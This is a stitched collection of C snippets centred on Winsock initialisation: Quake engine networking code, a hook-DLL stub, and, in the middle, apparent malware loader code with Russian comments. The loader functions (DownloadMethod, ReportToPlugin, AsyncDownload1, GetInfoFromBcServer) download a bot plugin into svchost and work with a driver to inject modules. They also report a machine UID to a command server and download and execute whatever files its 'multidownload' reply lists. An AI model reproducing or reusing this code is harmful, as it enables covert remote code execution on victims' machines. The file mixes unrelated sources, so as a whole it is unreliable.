// =============================================================================
// Hooked functions
// =============================================================================
int WINAPI MyWSAStartup(_In_ WORD wVersionRequested, _Out_ LPWSADATA lpWSAData)
{
int iResult;
MsgBox("HookDll : Entered MyWSAStartup");
iResult = pWSAStartup(MAKEWORD(2, 2), lpWSAData);
if (iResult != 0) {
MsgBox("WSAStartup failed with error\n");
return 1;
}
else MsgBox("WSAStartup succeded");
return iResult;
}
int WIPX_Init (void)
{
int i;
char buff[MAXHOSTNAMELEN];
struct qsockaddr addr;
char *p;
int r;
WORD wVersionRequested;
if (COM_CheckParm ("-noipx"))
return -1;
// make sure LoadLibrary has happened successfully
if (!winsock_lib_initialized)
return -1;
if (winsock_initialized == 0)
{
wVersionRequested = MAKEWORD(1, 1);
r = pWSAStartup (MAKEWORD(1, 1), &winsockdata);
if (r)
{
Con_Printf ("Winsock initialization failed.\n");
return -1;
}
}
winsock_initialized++;
for (i = 0; i < IPXSOCKETS; i++)
ipxsocket[i] = 0;
// determine my name & address
if (pgethostname(buff, MAXHOSTNAMELEN) == 0)
{
// if the quake hostname isn't set, set it to the machine name
if (Q_strcmp(hostname.string, "UNNAMED") == 0)
{
// see if it's a text IP address (well, close enough)
for (p = buff; *p; p++)
if ((*p < '0' || *p > '9') && *p != '.')
break;
// if it is a real name, strip off the domain; we only want the host
if (*p)
{
for (i = 0; i < 15; i++)
if (buff[i] == '.')
break;
buff[i] = 0;
}
Cvar_Set ("hostname", buff);
}
}
if ((net_controlsocket = WIPX_OpenSocket (0)) == -1)
{
Con_Printf("WIPX_Init: Unable to open control socket\n");
if (--winsock_initialized == 0)
pWSACleanup ();
return -1;
}
((struct sockaddr_ipx *)&broadcastaddr)->sa_family = AF_IPX;
memset(((struct sockaddr_ipx *)&broadcastaddr)->sa_netnum, 0, 4);
memset(((struct sockaddr_ipx *)&broadcastaddr)->sa_nodenum, 0xff, 6);
((struct sockaddr_ipx *)&broadcastaddr)->sa_socket = htons((unsigned short)net_hostport);
WIPX_GetSocketAddr (net_controlsocket, &addr);
Q_strcpy(my_ipx_address, WIPX_AddrToString (&addr));
p = Q_strrchr (my_ipx_address, ':');
if (p)
*p = 0;
Con_Printf("Winsock IPX Initialized\n");
ipxAvailable = true;
return net_controlsocket;
}
int WINS_Init(void)
{
int i;
char buff[MAXHOSTNAMELEN];
char *p;
int r;
WORD wVersionRequested;
HINSTANCE hInst;
// initialize the Winsock function vectors (we do this instead of statically linking
// so we can run on Win 3.1, where there isn't necessarily Winsock)
hInst = LoadLibrary("wsock32.dll");
if (hInst == NULL) {
Con_SafePrintf("Failed to load winsock.dll\n");
winsock_lib_initialized = false;
return -1;
}
winsock_lib_initialized = true;
pWSAStartup = (void *)GetProcAddress(hInst, "WSAStartup");
pWSACleanup = (void *)GetProcAddress(hInst, "WSACleanup");
pWSAGetLastError = (void *)GetProcAddress(hInst, "WSAGetLastError");
psocket = (void *)GetProcAddress(hInst, "socket");
pioctlsocket = (void *)GetProcAddress(hInst, "ioctlsocket");
psetsockopt = (void *)GetProcAddress(hInst, "setsockopt");
precvfrom = (void *)GetProcAddress(hInst, "recvfrom");
psendto = (void *)GetProcAddress(hInst, "sendto");
pclosesocket = (void *)GetProcAddress(hInst, "closesocket");
pgethostname = (void *)GetProcAddress(hInst, "gethostname");
pgethostbyname = (void *)GetProcAddress(hInst, "gethostbyname");
pgethostbyaddr = (void *)GetProcAddress(hInst, "gethostbyaddr");
pgetsockname = (void *)GetProcAddress(hInst, "getsockname");
if (!pWSAStartup || !pWSACleanup || !pWSAGetLastError ||
!psocket || !pioctlsocket || !psetsockopt ||
!precvfrom || !psendto || !pclosesocket ||
!pgethostname || !pgethostbyname || !pgethostbyaddr ||
!pgetsockname) {
Con_SafePrintf("Couldn't GetProcAddress from winsock.dll\n");
return -1;
}
if (COM_CheckParm("-noudp")) {
return -1;
}
if (winsock_initialized == 0) {
wVersionRequested = MAKEWORD(1, 1);
r = pWSAStartup(MAKEWORD(1, 1), &winsockdata);
if (r) {
Con_SafePrintf("Winsock initialization failed.\n");
return -1;
}
}
winsock_initialized++;
// determine my name
if (pgethostname(buff, MAXHOSTNAMELEN) == SOCKET_ERROR) {
Con_DPrintf("Winsock TCP/IP Initialization failed.\n");
if (--winsock_initialized == 0) {
pWSACleanup();
}
return -1;
}
// if the quake hostname isn't set, set it to the machine name
if (Q_strcmp(hostname.string, "UNNAMED") == 0) {
// see if it's a text IP address (well, close enough)
for (p = buff; *p; p++)
if ((*p < '0' || *p > '9') && *p != '.') {
break;
}
// if it is a real name, strip off the domain; we only want the host
if (*p) {
for (i = 0; i < 15; i++)
if (buff[i] == '.') {
break;
}
buff[i] = 0;
}
Cvar_Set("hostname", buff);
}
i = COM_CheckParm("-ip");
if (i) {
if (i < com_argc-1) {
myAddr = inet_addr(com_argv[i+1]);
if (myAddr == INADDR_NONE) {
Sys_Error("%s is not a valid IP address", com_argv[i+1]);
}
strcpy(my_tcpip_address, com_argv[i+1]);
} else {
Sys_Error("NET_Init: you must specify an IP address after -ip");
}
} else {
myAddr = INADDR_ANY;
strcpy(my_tcpip_address, "INADDR_ANY");
}
if ((net_controlsocket = WINS_OpenSocket(0)) == -1) {
Con_Printf("WINS_Init: Unable to open control socket\n");
if (--winsock_initialized == 0) {
pWSACleanup();
}
return -1;
}
((struct sockaddr_in *)&broadcastaddr)->sin_family = AF_INET;
((struct sockaddr_in *)&broadcastaddr)->sin_addr.s_addr = INADDR_BROADCAST;
((struct sockaddr_in *)&broadcastaddr)->sin_port = htons((unsigned short)net_hostport);
Con_DPrintf("Winsock TCP/IP Initialized\n"); // edited
tcpipAvailable = true;
return net_controlsocket;
}
DWORD WINAPI DownloadMethod(LPVOID Data)
{
// Функция загрузки плагина
PUSER_INIT_NOTIFY InitData = (PUSER_INIT_NOTIFY)Data;
LDRDBG("BRDS", "Отключаем слежение за процессом svchost.exe ");
DriverRemoveInjectToProcess(InitData, SVChostName);
for (;;)
{
WSADATA wsa;
ClearStruct(wsa);
DWORD Code = (DWORD)pWSAStartup(MAKEWORD( 2, 2 ), &wsa);
if (Code == 0) break;
LDRDBG("BRDS", "pWSAStartup failed.");
return 0; //pSleep(500);
}
LDRDBG("BRDS", "Запуск загрузки плагина бота (V 10) ");
DWORD Size = 0;
LPVOID Module = NULL;
//Загружаем библиотеку
LDRDBG("BRDS", "Инициализируем загрузку плагина!");
// 311_ld начало загрузки файла плага с сервера в svchost
DebugReportStepByName("311_ld");
Module = Plugin::DownloadEx(BotPluginName, NULL, &Size, true, true, NULL);
LDRDBG("BRDS", "DownloadEx result module=0x%u", Module);
// 312_ld окончание загрузки файла плага с сервера в svchost
DebugReportStepByName("312_ld");
if (Module != NULL)
{
// Сохраняем данные в кэш
LDRDBG("BRDS", "Бот успешно загружен ");
MemFree(Module);
// передаем прочитанную длл в драйвер
// добавляем модуль для инжекта в процесс диспетчера задач
// Уведомляем експлорер об успешной загрузке длл
LDRDBG("BRDS", "Уведомляем эксплорер ");
// 313_ld успешная загрузка файла плага с сервера в svchost
DebugReportStepByName("313_ld");
WaitExplorer();
PCHAR Buf = "Ok: ";
DriverSendDataToGlobalCallBack(InitData, &Buf, 4);
}
ThreadHandle = NULL; // Идентификатор потока нас больше не интересует
LDRDBG("BRDS", "DownloadMethod finised.");
return 0;
}
bool ReportToPlugin( char *Url )
{
WSADATA wsa;
if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
{
return false;
}
char *Host = NULL;
char *Path = NULL;
int Port = 0;
if ( !ParseUrl1( Url, &Host, &Path, &Port ) )
{
return false;
}
char Uid[100];
GenerateUid( Uid );
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
char *UserAgent = NULL;
UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
if ( UserAgent == NULL )
{
MemFree( UserAgent );
UserAgent = "-";
}
char Request[] = "POST %s HTTP/1.0\r\n"
"Host: %s\r\n"
"User-Agent: %s\r\n"
"Accept: text/html\r\n"
"Connection: Close\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n\r\n";
char Args[] = "id=";
char *HttpPacket = NULL;
HttpPacket = (char*)MemAlloc( 2048 );
int iTmp;
if (LoadExe!=NULL)
{
iTmp=m_lstrlen(LoadExe);
}else iTmp=9;
pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp );
m_lstrcat( HttpPacket, Args );
m_lstrcat( HttpPacket, Uid );
if (LoadExe==NULL)
{
LoadExe = (char*)MemAlloc(10);
m_lstrncpy(LoadExe,"&plugins=",9);
LoadExe[9]='\0';
}
m_lstrcat( HttpPacket, LoadExe );
SOCKET Socket = MyConnect1( Host, Port );
if( Socket == -1 )
{
return false;
}
bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );
MemFree( HttpPacket );
if ( !b )
{
return false;
}
DWORD dwSize = 0;
char *Buffer = RecvAndParse( Socket, &dwSize );
if ( !Buffer )
{
pclosesocket( Socket );
return false;
}
char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0};
char *Context;
m_strtok_s( Buffer, "\r\n", &Context );
if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) )
{
char * cPointer= m_strstr(&Buffer[1],"http:");
char* cUrl=Buffer;
char* cUrlNext;
int i;
char *DownloadUrl;
while (true)
{
cUrl= m_strstr(&cUrl[1],"http:");
if (cUrl==NULL)break;
cUrlNext= m_strstr(cUrl,"|");
i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext);
DownloadUrl = (char*)MemAlloc(i)+1;
m_lstrncpy(DownloadUrl,cUrl,i);
DownloadUrl[i]='\0';
if ( DownloadUrl )
{
LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1);
m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str());
m_lstrcat( LoadExe, "|");
WCHAR *FileName =(WCHAR *)GetTempName();
if ( FileName && DownloadUrl )
{
ExecuteFile( DownloadUrl, FileName );
}
MemFree( FileName );
}
MemFree( DownloadUrl );
}
}
MemFree( Buffer );
pclosesocket( Socket );
return true;
}
bool AsyncDownload1( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize )
{
WSADATA wsa;
if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
{
return false;
}
char *Host = NULL;
char *Path = NULL;
int Port = 80;
if ( !ParseUrl( Url, &Host, &Path, &Port ) )
{
return false;
}
SOCKET Socket = MyConnect( Host, Port );
if( Socket == -1 )
{
return false;
}
char *UserAgent = NULL;
UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
char *query=(char*)MemAlloc(2048);
m_lstrcpy(query,"GET /");
m_lstrcat(query,Path);
m_lstrcat(query," HTTP/1.1\r\nAccept: */* \r\n ");
m_lstrcat(query,"Accept-Language: ru \r\n");
m_lstrcat(query,"UA-CPU: x86 \r\n");
m_lstrcat(query,"Accept-Encoding: gzip, deflate \r\n");
m_lstrcat(query,"User-Agent: ");
m_lstrcat(query,UserAgent);
m_lstrcat(query,"\r\nHost: ");
m_lstrcat(query,Host);
m_lstrcat(query,"\r\nConnection: Close\r\n\r\n\r\n");
bool b = MySend( Socket, (const char *)query, m_lstrlen( query ) );
MemFree( Host );
//MemFree( Path );
MemFree( UserAgent );
MemFree( query );
if ( !b )
{
return false;
}
DWORD dwSizeFile = 0;
char *Buffer = RecvAndParse( Socket, &dwSizeFile );
if ( !Buffer )
{
pclosesocket( Socket );
return false;
}
if ( dwSize )
{
*lpBuffer = (LPBYTE)Buffer;
*dwSize = dwSizeFile;
return true;
}
return false;
}
char *GetInfoFromBcServer( char *Url )
{
WSADATA wsa;
if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
{
return false;
}
char *Host = NULL;
char *Path = NULL;
int Port = 0;
if ( !ParseUrl( Url, &Host, &Path, &Port ) )
{
return false;
}
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
char Request[] = "GET %s HTTP/1.0\r\n"
"Host: %s\r\n"
"User-Agent: %s\r\n"
"Connection: close\r\n\r\n";
char *HttpPacket = (char*)MemAlloc( 1024 );
if ( HttpPacket == NULL )
{
return false;
}
char *UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
_pwsprintfA( HttpPacket, Request, Path, Host, UserAgent );
SOCKET Socket = MyConnect( Host, Port );
if ( Socket == INVALID_SOCKET )
{
MemFree( HttpPacket );
return NULL;
}
bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );
MemFree( HttpPacket );
if ( !b )
{
return NULL;
}
DWORD dwSize = 0;
char *Buffer = RecvAndParse( Socket, &dwSize );
pclosesocket( Socket );
return Buffer;
}
int WINS_Init (void)
{
int i;
struct hostent *local = NULL;
char buff[MAXHOSTNAMELEN];
struct qsockaddr addr;
char *p;
int r;
WORD wVersionRequested;
// initialize the Winsock function vectors (we do this instead of statically linking
// so we can run on Win 3.1, where there isn't necessarily Winsock)
hInst = LoadLibrary("wsock32.dll");
if (hInst == NULL)
{
Con_SafePrintf ("Failed to load winsock.dll\n");
winsock_lib_initialized = false;
return -1;
}
winsock_lib_initialized = true;
pWSAStartup = (void *)GetProcAddress(hInst, "WSAStartup");
pWSACleanup = (void *)GetProcAddress(hInst, "WSACleanup");
pWSAGetLastError = (void *)GetProcAddress(hInst, "WSAGetLastError");
psocket = (void *)GetProcAddress(hInst, "socket");
pioctlsocket = (void *)GetProcAddress(hInst, "ioctlsocket");
psetsockopt = (void *)GetProcAddress(hInst, "setsockopt");
precvfrom = (void *)GetProcAddress(hInst, "recvfrom");
psendto = (void *)GetProcAddress(hInst, "sendto");
pclosesocket = (void *)GetProcAddress(hInst, "closesocket");
pgethostname = (void *)GetProcAddress(hInst, "gethostname");
pgethostbyname = (void *)GetProcAddress(hInst, "gethostbyname");
pgethostbyaddr = (void *)GetProcAddress(hInst, "gethostbyaddr");
pgetsockname = (void *)GetProcAddress(hInst, "getsockname");
if (!pWSAStartup || !pWSACleanup || !pWSAGetLastError ||
!psocket || !pioctlsocket || !psetsockopt ||
!precvfrom || !psendto || !pclosesocket ||
!pgethostname || !pgethostbyname || !pgethostbyaddr ||
!pgetsockname)
{
Con_SafePrintf ("Couldn't GetProcAddress from winsock.dll\n");
return -1;
}
if (COM_CheckParm ("-noudp"))
return -1;
if (winsock_initialized == 0)
{
wVersionRequested = MAKEWORD(1, 1);
r = pWSAStartup (MAKEWORD(1, 1), &winsockdata);
if (r)
{
Con_SafePrintf ("Winsock initialization failed.\n");
return -1;
}
}
winsock_initialized++;
// determine my name & address
if (pgethostname(buff, MAXHOSTNAMELEN) == 0)
{
blocktime = Sys_FloatTime();
WSASetBlockingHook(BlockingHook);
local = pgethostbyname(buff);
WSAUnhookBlockingHook();
if (local == NULL)
{
Con_DPrintf ("Winsock TCP/IP Initialization timed out.\n");
if (--winsock_initialized == 0)
pWSACleanup ();
return -1;
}
}
if (local)
{
myAddr = *(int *)local->h_addr_list[0];
// if the quake hostname isn't set, set it to the machine name
if (strcmp(hostname.string, "UNNAMED") == 0)
{
// see if it's a text IP address (well, close enough)
for (p = buff; *p; p++)
if ((*p < '0' || *p > '9') && *p != '.')
break;
// if it is a real name, strip off the domain; we only want the host
if (*p)
{
for (i = 0; i < 15; i++)
if (buff[i] == '.')
break;
buff[i] = 0;
}
Cvar_Set ("hostname", buff);
}
}
if ((net_controlsocket = WINS_OpenSocket (0)) == -1)
{
Con_Printf("WINS_Init: Unable to open control socket\n");
if (--winsock_initialized == 0)
pWSACleanup ();
return -1;
}
((struct sockaddr_in *)&broadcastaddr)->sin_family = AF_INET;
((struct sockaddr_in *)&broadcastaddr)->sin_addr.s_addr = INADDR_BROADCAST;
((struct sockaddr_in *)&broadcastaddr)->sin_port = htons((unsigned short)net_hostport);
WINS_GetSocketAddr (net_controlsocket, &addr);
strcpy(my_tcpip_address, WINS_AddrToString (&addr));
p = strrchr (my_tcpip_address, ':');
if (p)
*p = 0;
Con_Printf("Winsock TCP/IP Initialized\n");
tcpipAvailable = true;
return net_controlsocket;
}